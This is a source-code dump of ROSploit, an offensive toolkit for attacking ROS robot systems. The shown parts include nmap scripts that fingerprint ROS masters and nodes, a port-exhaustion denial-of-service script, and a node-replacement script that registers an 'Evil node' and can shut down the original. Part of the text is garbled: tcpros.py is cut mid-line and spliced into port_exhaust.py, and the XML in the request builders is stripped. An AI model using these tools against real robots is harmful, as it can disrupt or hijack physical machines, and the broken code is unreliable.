├── .gitignore
├── .idea
├── misc.xml
├── modules.xml
└── rosploit.iml
├── LICENSE
├── README.md
├── core
├── __init__.py
├── exceptions.py
├── message.py
├── node.py
├── probe_node.py
├── tcpros.py
└── topic.py
├── exploit
├── __init__.py
├── change_parameter.py
├── dos.py
├── kill_node.py
├── list_parameters.py
├── message_injection.py
├── mitm.py
├── port_exhaust.py
└── replace_node.py
├── recon
├── __init__.py
├── ros-master-scan.nse
├── ros-node-id.nse
└── scan_node.py
├── requirements.txt
├── rosploit.py
├── setup.py
└── test
├── test_TCPROS.py
└── test_rosploit.py
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | env/
12 | build/
13 | develop-eggs/
14 | dist/
15 | downloads/
16 | eggs/
17 | .eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 |
28 | # PyInstaller
29 | # Usually these files are written by a python script from a template
30 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
31 | *.manifest
32 | *.spec
33 |
34 | # Installer logs
35 | pip-log.txt
36 | pip-delete-this-directory.txt
37 |
38 | # Unit test / coverage reports
39 | htmlcov/
40 | .tox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | .hypothesis/
48 |
49 | # Translations
50 | *.mo
51 | *.pot
52 |
53 | # Django stuff:
54 | *.log
55 | local_settings.py
56 |
57 | # Flask stuff:
58 | instance/
59 | .webassets-cache
60 |
61 | # Scrapy stuff:
62 | .scrapy
63 |
64 | # Sphinx documentation
65 | docs/_build/
66 |
67 | # PyBuilder
68 | target/
69 |
70 | # Jupyter Notebook
71 | .ipynb_checkpoints
72 |
73 | # pyenv
74 | .python-version
75 |
76 | # celery beat schedule file
77 | celerybeat-schedule
78 |
79 | # SageMath parsed files
80 | *.sage.py
81 |
82 | # dotenv
83 | .env
84 |
85 | # virtualenv
86 | .venv
87 | venv/
88 | ENV/
89 |
90 | # Spyder project settings
91 | .spyderproject
92 | .spyproject
93 |
94 | # Rope project settings
95 | .ropeproject
96 |
97 | # mkdocs documentation
98 | /site
99 |
100 | # mypy
101 | .mypy_cache/
102 |
103 | #pycharm
104 | .idea/*
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/rosploit.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Sean Rivera
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Rosploit
2 | ROSploit is a collection of tools and scripts designed to aid in the exploitation of ROS(Robotic operating system) robots.
3 |
4 | # Dependencies
5 | python-nmap
6 |
7 | `pip3 install -r requirements.txt`
8 |
9 | # Installation
10 | The code has a requirements.txt file which accurately reflects the dependencies. Install it with
11 | `pip3 install -r requirements.txt`
12 |
13 | # Execution
14 |
15 | To execute any of the individual modules use:
16 |
17 | `python3 -m "module.script"`
18 |
19 | To execute the wrapper code use:
20 |
21 | `python3 rosploit`
--------------------------------------------------------------------------------
/core/__init__.py:
--------------------------------------------------------------------------------
1 | from .exceptions import StateException
2 | from .message import Message
3 | from .node import Node
4 | from .probe_node import probe_node
5 | from .topic import Topic
6 |
--------------------------------------------------------------------------------
/core/exceptions.py:
--------------------------------------------------------------------------------
1 | class StateException(Exception):
2 | def __init__(self, message):
3 | """
4 | Custom exception for when the robot state isn't what is expected
5 | :param message: Message for the user to diagnose the state.
6 | """
7 | self.message = message
8 |
--------------------------------------------------------------------------------
/core/message.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | from genpy import message
4 |
5 | from core.exceptions import StateException
6 |
7 |
8 | class Message:
9 | def __init__(self, msg_type: str):
10 | """
11 | Wrapper code to integrate ros message
12 | :param msg_type: The name of the message
13 | """
14 | # TODO: THIS IS STILL CALLING ROS CODE
15 | self.msg_class = message.get_message_class(msg_type, reload_on_error=False)
16 | if self.msg_class is None:
17 | raise StateException("Topic tracking didnt work")
18 | self.type = msg_type
19 | self.md5sum = self.msg_class._md5sum
20 | # TODO: NEED TO FILL MESSAGES
21 |
22 | @classmethod
23 | def from_json(cls, o):
24 | """
25 | Create a node object from a json string
26 | :param o: A JSON object
27 | :return: A node object
28 | """
29 | class_dict = json.loads(o)
30 | cls.type = class_dict['type']
31 | return cls(msg_type=cls.type)
32 |
--------------------------------------------------------------------------------
/core/node.py:
--------------------------------------------------------------------------------
1 | # Node class definition for common communication of scripts
2 | import json
3 | import socket
4 | import xmlrpc.client
5 |
6 | from core.exceptions import StateException
7 | from core.message import Message
8 | from core.topic import Topic
9 |
10 |
11 | class Node:
12 | """
13 | Defines a Ros node class, which allows a common structure for passing information about ros nodes
14 | """
15 |
16 | server = None
17 |
18 | def __init__(self, ip_addr: str, port: str, notes: str = ''):
19 | try:
20 | socket.inet_aton(ip_addr)
21 | except socket.error:
22 | print("Invalid IP address given to create node")
23 | raise
24 | self.ip_addr = ip_addr
25 | self.port = port
26 | self.notes = notes
27 | self.server = xmlrpc.client.ServerProxy("http://" + self.ip_addr + ":" + self.port)
28 | self.pub_topics = []
29 | self.sub_topics = []
30 | self.name = ""
31 |
32 | def to_json(self):
33 | """
34 | Convert the node to a json string
35 | :return: a json string
36 | """
37 | return json.dumps({"ip_addr": self.ip_addr, "port": self.port, "notes": self.notes}, sort_keys=True, indent=4)
38 |
39 | @classmethod
40 | def from_json(cls, o):
41 | """
42 | Create a node object from a json string
43 | :param o: A JSON object
44 | :return: A node object
45 | """
46 | class_dict = json.loads(o)
47 | cls.ip_addr = class_dict['ip_addr']
48 | cls.port = class_dict['port']
49 | cls.notes = class_dict['notes']
50 | return cls(ip_addr=cls.ip_addr, port=cls.port, notes=cls.notes)
51 |
52 | def get_pub_list(self, node_name: str):
53 | """
54 | Update the local publisher list
55 | :param node_name: Name of the requester to give to the node
56 | :return: None
57 | """
58 | try:
59 | (_, _, topic_list) = self.server.getPublications(node_name)
60 | for topic in topic_list:
61 | print(topic)
62 | message = Message(msg_type=topic[1])
63 | self.pub_topics.append(Topic(topic_name=topic[0], message=message, protocol="TCPROS"))
64 | except xmlrpc.client.Fault as err:
65 | print(err)
66 |
67 | def get_sub_list(self, node_name: str):
68 | """
69 | Update the local subscriber list
70 | :param node_name: Name of the requester to give to the node
71 | :return: None
72 | """
73 | try:
74 | (_, _, topic_list) = self.server.getSubscriptions(node_name)
75 | for topic in topic_list:
76 | message = Message(msg_type=topic[1])
77 | self.sub_topics.append(Topic(topic_name=topic[0], message=message, protocol="TCPROS"))
78 | except xmlrpc.client.Fault as err:
79 | print(err)
80 |
81 | def connect_to_pub(self, topic_name: str, node):
82 | """
83 | Call this function to subscribe to one of the topics that this node publishes
84 | :return:
85 | """
86 | target_topic = [x for x in self.pub_topics if x.name == topic_name]
87 | if len(target_topic) > 0:
88 | # TODO: Make less Hacky
89 | if len(target_topic) < 2:
90 | raise StateException("Node publishing the same topic twice. Error in list comprehension")
91 | (status, _, info) = self.server.requestTopic(node.name, topic_name, [["TCPROS"]])
92 | (proto, ip_addr, port) = info
93 | new_topic = Topic(topic_name=target_topic[0].name, message=target_topic[0].message,
94 | protocol=target_topic[0].protocol)
95 | new_topic.create_tcpros(direction="Subscribe", ip_addr=ip_addr, port=port)
96 | node.sub_topics.append(new_topic)
97 |
98 | else:
99 | print("No such topic")
100 |
101 | def get_name(self, node_name: str):
102 | """
103 | Get the name of a node. Only works for python nodes.
104 | :param node_name: Name of the requester.
105 | :return: None
106 | """
107 | try:
108 | self.server.getName(node_name)
109 | except xmlrpc.client.Fault as err:
110 | print(err)
111 |
--------------------------------------------------------------------------------
/core/probe_node.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | import argparse
3 | import xmlrpc.client
4 |
5 | from core.node import Node
6 |
7 |
8 | def probe_node(node: Node):
9 | """
10 | This is an information gathering function. It calls the getBusInfo function and parses all the info
11 | into a more usable form
12 | """
13 |
14 | node_id = '/rosnode'
15 | topic_list = []
16 | with xmlrpc.client.ServerProxy("http://" + node.ip_addr + ":" + node.port) as proxy:
17 | topic_info = proxy.getBusInfo(node_id)
18 | node_name = proxy.getName(node_id)
19 | if topic_info[0] == 1 and node_name[0] == 1:
20 | print("Successfully got the bus info")
21 | print(node_name[2])
22 | for topic in topic_info[2]:
23 | print(topic)
24 | topic_list.append(topic[4])
25 | print(topic[4])
26 | return node_name[2], topic_list, topic_info[2]
27 | else:
28 | print("Got an error message with the command. " + topic_info[1] + topic_info[2])
29 |
30 |
31 | if __name__ == "__main__":
32 | parser = argparse.ArgumentParser(
33 | description='Get the information about a given node (Name/Topics publisher of/Topics subscriber to)')
34 | parser.add_argument('-a', '--address', help="Address of the ROS node you want info on", required=True)
35 | parser.add_argument('-p', '--port', help="Port of the ROS node you want info on", required=True)
36 | args = parser.parse_args()
37 | cur_node = Node(ip_addr=args.address, port=args.port)
38 | nodeInfo = probe_node(cur_node)
39 | print(nodeInfo)
40 |
--------------------------------------------------------------------------------
/core/tcpros.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | #
3 | import socket
4 | import struct
5 |
6 |
7 | class TCPROS:
8 | """
9 | TCPROS reimplementation Object
10 | """
11 | def __init__(self, connection_type="", message_definition="", caller_id="", service="", md5sum="", message_type="",
12 | tcp_nodelay="0", topic="",
13 | latching="0", persistent="0", error="", data="", ip_addr="", port=0, items=None):
14 | self.connection_type = connection_type
15 | self.message_definition = message_definition
16 | self.caller_id = caller_id
17 | self.service = service
18 | self.md5sum = md5sum
19 | self.message_type = message_type
20 | self.tcp_nodelay = tcp_nodelay
21 | self.latching = latching
22 | self.persistent = persistent
23 | self.error = error
24 | self.topic = topic
25 | self.header = None
26 | self.data = data
27 | self.items = items
28 | self.port = port
29 | self.ip_addr = ip_addr
30 | self.sock = None
31 |
32 | def __del__(self):
33 | if self.sock:
34 | self.sock.close()
35 |
36 | @classmethod
37 | def subscriber(cls, message_definition: str, caller_id: str, topic: str, md5sum: str, message_type: str, port: int,
38 | ip_addr: str,
39 | tcp_nodelay='0', error="", data=""):
40 | cls.message_definition = message_definition
41 | cls.caller_id = caller_id
42 | cls.topic = topic
43 | cls.md5sum = md5sum
44 | cls.message_type = message_type
45 | cls.tcp_nodelay = tcp_nodelay
46 | cls.error = error
47 | cls.data = data
48 | cls.port = port
49 | cls.ip_addr = ip_addr
50 | cls.items = {'message_definition': message_definition, 'caller_id': caller_id, 'topic': topic, 'md5sum': md5sum,
51 | 'message_type': message_type, 'tcp_nodelay': tcp_nodelay}
52 | return cls(connection_type="subscription", message_definition=cls.message_definition, caller_id=cls.caller_id,
53 | topic=cls.topic, md5sum=cls.md5sum, message_type=cls.message_type, tcp_nodelay=cls.tcp_nodelay,
54 | error=cls.error, data=cls.data, items=cls.items, port=cls.port, ip_addr=cls.ip_addr)
55 |
56 | @classmethod
57 | def publisher(cls, message_definition: str, topic: str, md5sum: str, message_type: str, port: int, ip_addr: str,
58 | caller_id="", latching="0", error="", data=""):
59 | cls.message_definition = message_definition
60 | cls.topic = topic
61 | cls.md5sum = md5sum
62 | cls.message_type = message_type
63 | cls.caller_id = caller_id
64 | cls.latching = latching
65 | cls.error = error
66 | cls.data = data
67 | cls.port = port
68 | cls.ip_addr = ip_addr
69 | cls.items = {'message_definition': message_definition, 'caller_id': caller_id, 'md5sum': md5sum,
70 | 'message_type': message_type, 'latching': latching}
71 | return cls(message_definition=cls.message_definition, topic=cls.topic, connection_type="publisher",
72 | md5sum=cls.md5sum,
73 | caller_id=cls.caller_id, latching=cls.latching, error=cls.error, data=cls.data, items=cls.items,
74 | port=cls.port, ip_addr=cls.ip_addr)
75 |
76 | @classmethod
77 | def client(cls, caller_id: str, service: str, md5sum: str, message_type: str, port: int, ip_addr: str,
78 | persistent="0", error="", data="", ):
79 | cls.caller_id = caller_id
80 | cls.service = service
81 | cls.md5sum = md5sum
82 | cls.message_type = message_type
83 | cls.persistent = persistent
84 | cls.error = error
85 | cls.data = data
86 | cls.port = port
87 | cls.ip_addr = ip_addr
88 |
89 | cls.items = {'caller_id': caller_id, 'service': service, 'md5sum': md5sum, 'message_type': message_type,
90 | 'persistent': persistent}
91 | return cls(connection_type="client", caller_id=cls.caller_id, service=cls.service, md5sum=cls.md5sum,
92 | persistent=cls.persistent, error=cls.error, data=cls.data, items=cls.items, port=cls.port,
93 | ip_addr=cls.ip_addr)
94 |
95 | @classmethod
96 | def service(cls, caller_id: str, port: int, ip_addr: str, error="", data="", ):
97 | cls.caller_id = caller_id
98 | cls.error = error
99 | cls.data = data
100 | cls.items = {'caller_id': caller_id}
101 | cls.port = port
102 | cls.ip_addr = ip_addr
103 | return cls(connection_type="service", caller_id=cls.caller_id, error=cls.error, data=cls.data, items=cls.items,
104 | port=cls.port, ip_addr=cls.ip_addr)
105 |
106 | def create_header(self):
107 | str_cls = str
108 |
109 | # encoding code taken from
110 | # https://github.com/ros/ros_comm/blob/247459207e20c1da109fc306e58b84d15c4107bd/tools/rosgraph/src/rosgraph/network.py
111 | # TODO: Cleanup
112 | # encode all unicode keys in the header. Ideally, the type of these would be specified by the api
113 | encoded_header = {}
114 | # TODO: Bad names
115 | for k, v in self.items.items():
116 | if isinstance(k, str_cls):
117 | k = k.encode('utf-8')
118 | if isinstance(v, str_cls):
119 | v = v.encode('utf-8')
120 | encoded_header[k] = v
121 |
122 | fields = [k + b"=" + v for k, v in sorted(encoded_header.items())]
123 |
124 | s = b''.join([struct.pack(' 0:
20 | target_topic = node.pub_topics[0]
21 | (_, _, port_info) = target_node.server.requestTopic(node_name, target_topic.name, [[target_topic.protocol]])
22 | (_, ip_addr, port) = port_info
23 | # To make sure we don't exhaust our ports first
24 | if sys.platform.startswith('linux'):
25 | import resource # module fails importing on Windows
26 | soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
27 | limit = max(soft, hard)
28 | resource.setrlimit(resource.RLIMIT_NOFILE, (limit, hard))
29 | s_list = []
30 | try:
31 | for i in range(65535):
32 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
33 | s.connect((ip_addr, port))
34 | s_list.append(s)
35 | except Exception as e:
36 | print(e)
37 | print(len(s_list))
38 |
39 |
40 | if __name__ == "__main__":
41 | node_list = scan_node.scan_host('127.0.0.1', '1-', ['ros-master-scan.nse', 'ros-node-id.nse'])
42 | for node in node_list:
43 | if "Publisher" in node.notes:
44 | target = node
45 | port_exhaust(target, "/port_exhaust")
46 |
--------------------------------------------------------------------------------
/exploit/replace_node.py:
--------------------------------------------------------------------------------
1 | import copy
2 | import xmlrpc.client
3 |
4 | from core.node import Node
5 |
6 |
7 | def replace_node(target_node: Node, node_name: str, new_ip: str = "", new_port: str = "0", alert_master=False,
8 | kill_original=False):
9 | """
10 | Replace a node with an attacker controlled Node. Can optionally kill the original
11 | :param target_node: Node to replace
12 | :param node_name: The name to give for ros exploits
13 | :param new_ip: IP address for the node to use if blank the node will be created on local host
14 | :param new_port: Port for the node to use. If 0 the node will open a port first
15 | :param alert_master: Boolean value. If true replace the node in the masters graph, if false updates to the state
16 | do not reach the new node
17 | :param kill_original: Boolean Value. If true kill the original node as part of execution
18 | :return:
19 | """
20 | new_node = Node(ip_addr=new_ip, port=new_port, notes="Evil node")
21 | node_uri = "http://" + new_ip + ":" + new_port
22 | target_node.get_pub_list(node_name=node_name)
23 | target_node.get_pub_list(node_name=node_name)
24 |
25 | # TODO: Let the other nodes know about the replacement
26 | for topic in target_node.pub_topics:
27 | new_node.pub_topics.append(copy.copy(topic))
28 | for topic in target_node.sub_topics:
29 | new_node.sub_topics.append(copy.copy(topic))
30 |
31 | if alert_master:
32 | (_, _, master_url) = target_node.server.getMasterUri(node_name)
33 | master = xmlrpc.client.ServerProxy(master_url)
34 | for topic in new_node.pub_topics:
35 | master.registerPublisher(node_name, topic.name, topic.message_type, node_uri)
36 | # TODO: Create connections to subscriber
37 | for topic in new_node.sub_topics:
38 | master.registerSubscriber(node_name, topic.name, topic.message_type, node_uri)
39 |
40 | if kill_original:
41 | target_node.server.shutdown(node_name, "")
42 |
--------------------------------------------------------------------------------
/recon/__init__.py:
--------------------------------------------------------------------------------
1 | from .scan_node import scan_host
2 |
--------------------------------------------------------------------------------
/recon/ros-master-scan.nse:
--------------------------------------------------------------------------------
1 | -- The Head Section --
2 | local http = require "http"
3 | local nmap = require "nmap"
4 | local shortport = require "shortport"
5 | local slaxml = require "slaxml"
6 | local stdnse = require "stdnse"
7 | local strbuf = require "strbuf"
8 | local string = require "string"
9 | local table = require "table"
10 |
11 | description = [[
12 | Performs an XLMPRC lookup of a ROS system. Attempts to call the getSystemState
13 | to get an idea of the visible nodes and topics.
14 |
15 | TODO: Eventually it would be wise to additionally scan the ports mentioned as being open and then determine if we can
16 | talk to various services running on the robot
17 |
18 | ]]
19 |
20 | ---
21 | -- @args ros-master-scan.url the URI path to request
22 | --
23 | -- @output
24 | -- | Supported Methods:
25 | -- | TODO
26 | -- | TODO
27 | -- |_ TODO
28 | --
29 | -- @xmloutput
30 | --
31 | -- TODO
32 | --
33 | -- TODO
34 | --
35 | --
36 |
37 | author = "Sean Rivera"
38 |
39 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
40 |
41 | categories = {
42 | "discovery",
43 | }
44 |
45 | -- The Rule Section --
46 | function portrule (host, port)
47 | return port.protocol == "tcp" and port.number == 11311 and port.state == "open"
48 | end
49 |
50 | --TODO Update this --
51 | local function set_80_columns (t)
52 | local buffer = strbuf.new()
53 | for method, description in pairs(t) do
54 | buffer = (buffer .. string.format(" %s:\n\n", method))
55 | local line, ll = {}, 0
56 | local add_word = function (word)
57 | if #word + ll + 1 < 78 then
58 | table.insert(line, word)
59 | ll = ll + #word + 1
60 | else
61 | buffer = buffer .. stdnse.strjoin(" ", line) .. "\n"
62 | ll = #word + 1
63 | line = {
64 | word,
65 | }
66 | end
67 | end
68 | string.gsub(description, "(%S+)", add_word)
69 | buffer = buffer .. stdnse.strjoin(" ", line) .. "\n\n"
70 | end
71 | return "\n" .. strbuf.dump(buffer)
72 | end
73 |
74 | local function build_rpc_request (method_name, params_table)
75 | local retcall = ""
76 | retcall = retcall .. "" .. method_name .. ""
77 | retcall = retcall .. ""
78 | for ind, param in pairs(params_table) do
79 | retcall = retcall .. "" .. ""
80 | retcall = retcall .. "" .. param .. ""
81 | retcall = retcall .. "" .. ""
82 | end
83 | retcall = retcall .. ""
84 | retcall = retcall .. ""
85 | return retcall
86 | end
87 |
88 |
89 | -- The Action Section --
90 | function action (host, port)
91 | local returns_list = {
92 | "code",
93 | "statusMessage",
94 | "systemState",
95 | }
96 | local state_list = {
97 | "publishers",
98 | "subscribers",
99 | "services",
100 | }
101 | local recurse_ports = stdnse.get_script_args "ros.follow"
102 | local url = stdnse.get_script_args(SCRIPT_NAME .. ".url") or "/"
103 | local caller_id = "/totallyhacker"
104 | local data = build_rpc_request("getSystemState", {
105 | caller_id,
106 | })
107 | local response = http.post(host, port, url, {
108 | header = {
109 | ["Content-Type"] = "application/x-www-form-urlencoded",
110 | },
111 | }, nil, data)
112 | if not (response and response.status and response.body) then
113 | stdnse.debug1 "HTTP POST failed"
114 | return nil
115 | end
116 | local output = stdnse.output_table()
117 | output["systemState"] = stdnse.output_table()
118 | local output_name = "Supported Methods"
119 | local parser = slaxml.parser:new()
120 | local under_80 = {
121 | __tostring = set_80_columns,
122 | }
123 | local filter = "current system state"
124 | local i_state, v_state = nil, nil
125 | local output_ptr = output
126 | local current_pubname = ""
127 | if response.status == 200 and response.body:find(filter, nil, true) then
128 | local nest_level = 0
129 | parser._call = {
130 | startElement = function (name)
131 | if name == "array" then
132 | -- struture of the response [ code, statusMessage, systemState --
133 | -- structure of the systemState [ publishers, subscribers, services --
134 | -- structure of the nested publishers [topic [ publisher1, publisher2... ] ] --
135 | -- structure of the nested subscribers [ topic [subscriber1, subscriber2... ] ] --
136 | -- structure of the nested services [service [serviceProvider1, serviceProvider2]] --
137 | nest_level = nest_level + 1
138 | if nest_level == 1 then
139 | output["statusMessage"] = output["statusMessage"] or {}
140 | output_ptr = output["statusMessage"]
141 | elseif nest_level == 2 then
142 | output["systemState"] = output["systemState"] or {}
143 | output_ptr = output["systemState"]
144 | elseif nest_level == 3 then
145 | i_state, v_state = next(state_list, i_state)
146 | output["systemState"][v_state] = output["systemState"][v_state] or {}
147 | output_ptr = output["systemState"][v_state]
148 | elseif nest_level == 5 then
149 | output["systemState"][v_state][current_pubname] = output["systemState"][v_state][current_pubname] or {}
150 | output_ptr = output["systemState"][v_state][current_pubname]
151 | end
152 |
153 | end
154 | parser._call.text = name == "string" and function (content)
155 | if nest_level == 4 then
156 | current_pubname = content
157 | else
158 | output_ptr = output_ptr or {}
159 | table.insert(output_ptr, content)
160 | end
161 | end
162 | end,
163 | closeElement = function (name)
164 | if name == "array" then
165 | nest_level = nest_level - 1
166 | end
167 | parser._call.text = function ()
168 | return nil
169 | end
170 | end,
171 | }
172 | parser:parseSAX(response.body, {
173 | stripWhitespace = true,
174 | })
175 | --TODO: Do I want this?
176 | --if recurse_ports then
177 | -- for ind, val in pairs(state_list) do
178 | -- print("Beginning to recurse on all found " .. val .. " now\n")
179 | -- for ind2, val2 in pairs(output["systemState"][val]) do
180 | -- if val == "publishers" or val == "subscribers" then
181 | -- data = build_rpc_request("lookupNode", {
182 | -- caller_id,
183 | -- ind2,
184 | -- })
185 | -- else
186 | -- data = build_rpc_request("lookupService", {
187 | -- caller_id,
188 | -- ind2,
189 | -- })
190 | -- end
191 | -- --TODO: Function this
192 | -- local response_nest = http.post(host, port, url, {
193 | -- header = {
194 | -- ["Content-Type"] = "application/x-www-form-urlencoded",
195 | -- },
196 | -- }, nil, data)
197 | -- if not (response_nest and response_nest.status and response_nest.body) then
198 | -- stdnse.debug1 "HTTP POST FAILED "
199 | -- --stdnse.debug1 "HTTP POST FAILED for type " .. val .. " and topic " .. ind2
200 | -- return nil
201 | -- end
202 | -- print(response_nest.body)
203 | -- end
204 | -- end
205 | --end
206 | return output
207 | elseif response.body:find("faultCode", nil, true) then
208 | output.error = "XMLRPC instance doesn't support introspection."
209 | return response.body
210 | --return output, output.error
211 | end
212 | end
213 |
--------------------------------------------------------------------------------
/recon/ros-node-id.nse:
--------------------------------------------------------------------------------
1 | -- The Head Section --
2 | local http = require "http"
3 | local nmap = require "nmap"
4 | local shortport = require "shortport"
5 | local slaxml = require "slaxml"
6 | local stdnse = require "stdnse"
7 | local strbuf = require "strbuf"
8 | local string = require "string"
9 | local table = require "table"
10 |
11 | description = [[
12 | Performs an XLMPRC lookup of a ROS system. Attempts to determine if a given port is a ROS master or an ROS slave, and ideally determine what kind of slave(publisher/subscriber) it is.
13 | ]]
14 |
15 | ---
16 | -- @args
17 | --
18 | -- @output
19 | -- | Supported Methods:
20 | -- | TODO
21 | -- | TODO
22 | -- |_ TODO
23 | --
24 | -- @xmloutput
25 | --
26 | -- TODO
27 | --
28 | -- TODO
29 | --
30 | --
31 |
32 | author = "Sean Rivera"
33 |
34 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
35 |
36 | categories = {
37 | "discovery",
38 | }
39 |
40 |
41 | function portrule (host, port)
42 | return port.protocol == "tcp" and port.state == "open"
43 | end
44 |
45 | local function build_rpc_request (method_name, params_table)
46 | local retcall = ""
47 | retcall = retcall .. "" .. method_name .. ""
48 | retcall = retcall .. ""
49 | for ind, param in pairs(params_table) do
50 | retcall = retcall .. "" .. ""
51 | retcall = retcall .. "" .. param .. ""
52 | retcall = retcall .. "" .. ""
53 | end
54 | retcall = retcall .. ""
55 | retcall = retcall .. ""
56 | return retcall
57 | end
58 |
59 | local function message_port(host, port, message)
60 | local url = stdnse.get_script_args(SCRIPT_NAME .. ".url") or "/"
61 | local response = http.post(host, port, url, {
62 | header = {
63 | ["Content-Type"] = "application/x-www-form-urlencoded",
64 | },
65 | }, nil, message)
66 | if not (response and response.status and response.body) then
67 | return nil, nil
68 | end
69 | local filter = "faultCode"
70 | if response.status == 200 and not response.body:find(filter, nil, true) then
71 | return "success", response
72 | else
73 | return "fault", nil
74 | end
75 | end
76 |
77 | local function tcpros(host, port)
78 | --tcpros is on top of a normal tcp socket
79 | local socket = nmap.new_socket()
80 | --Taken from their website as a generic example message: TODO craft a better packet
81 | local variable = { 0xb0, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x6d,
82 | 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e,
83 | 0x69, 0x74, 0x69, 0x6f, 0x6e, 0x3d, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67,
84 | 0x20, 0x64, 0x61, 0x74, 0x61, 0x0a, 0x0a, 0x25, 0x00, 0x00, 0x00, 0x63,
85 | 0x61, 0x6c, 0x6c, 0x65, 0x72, 0x69, 0x64, 0x3d, 0x2f, 0x72, 0x6f, 0x73,
86 | 0x74, 0x6f, 0x70, 0x69, 0x63, 0x5f, 0x34, 0x37, 0x36, 0x37, 0x5f, 0x31,
87 | 0x33, 0x31, 0x36, 0x39, 0x31, 0x32, 0x37, 0x34, 0x31, 0x35, 0x35, 0x37,
88 | 0x0a, 0x00, 0x00, 0x00, 0x6c, 0x61, 0x74, 0x63, 0x68, 0x69, 0x6e, 0x67,
89 | 0x3d, 0x31, 0x27, 0x00, 0x00, 0x00, 0x6d, 0x64, 0x35, 0x73, 0x75, 0x6d,
90 | 0x3d, 0x39, 0x39, 0x32, 0x63, 0x65, 0x38, 0x61, 0x31, 0x36, 0x38, 0x37,
91 | 0x63, 0x65, 0x63, 0x38, 0x63, 0x38, 0x62, 0x64, 0x38, 0x38, 0x33, 0x65,
92 | 0x63, 0x37, 0x33, 0x63, 0x61, 0x34, 0x31, 0x64, 0x31, 0x0e, 0x00, 0x00,
93 | 0x00, 0x74, 0x6f, 0x70, 0x69, 0x63, 0x3d, 0x2f, 0x63, 0x68, 0x61, 0x74,
94 | 0x74, 0x65, 0x72, 0x14, 0x00, 0x00, 0x00, 0x74, 0x79, 0x70, 0x65, 0x3d,
95 | 0x73, 0x74, 0x64, 0x5f, 0x6d, 0x73, 0x67, 0x73, 0x2f, 0x53, 0x74, 0x72,
96 | 0x69, 0x6e, 0x67, 0x09, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x68,
97 | 0x65, 0x6c, 0x6c, 0x6f}
98 | local msg = ""
99 | for ind,val in pairs(variable) do
100 | msg = msg .. string.char(val)
101 | end
102 | catch = function(status, err)
103 | socket:close()
104 | end
105 | try = nmap.new_try(catch)
106 | try(socket:connect(host, port))
107 | try(socket:send(msg))
108 | local data = try(socket:receive())
109 | local filter_topic = "error=.*nonexistent topic"
110 | local filter_publisher = "error=.*is not a publisher of"
111 | local filter_pub_name = "(/.*)(%])"
112 | local result = nil
113 | if(data:match(filter_topic)) then
114 | --TODO Can I figure out what service exatly
115 | result= "ROS service node "
116 | elseif data:match(filter_publisher) then
117 | result=data:match(filter_publisher)
118 | --TODO double filter looks bad
119 | --TODO IS THIS RIGHT? I THINK SO?
120 | result=" ROS topic Node with a publisher " .. result:match(filter_pub_name)
121 | end
122 | socket:close()
123 | return result
124 | --return data
125 |
126 | end
127 |
128 | function action (host, port)
129 |
130 | local caller_id = "/rosnode"
131 | local master_check = build_rpc_request("getUri", {
132 | caller_id,
133 | })
134 | local slave_check = build_rpc_request("getMasterUri", {
135 | caller_id,
136 | })
137 | local publisher_check = build_rpc_request("getBusInfo", {
138 | caller_id,
139 | })
140 | local master_fault, master_response = message_port(host, port, master_check)
141 | local slave_fault, slave_response = message_port(host, port, slave_check)
142 | local publisher_fault, publisher_response = message_port(host, port, publisher_check)
143 | --TODO should I track the fault code
144 | -- print(master_response)
145 | -- print(slave_response)
146 | -- print(publisher_response)
147 | if (master_fault or slave_fault or publisher_fault) then
148 | if master_response and slave_response and not publisher_response then
149 | -- TODO remove
150 | uri_string = "[^>]+"
151 | masterid = slave_response.body:match(uri_string)
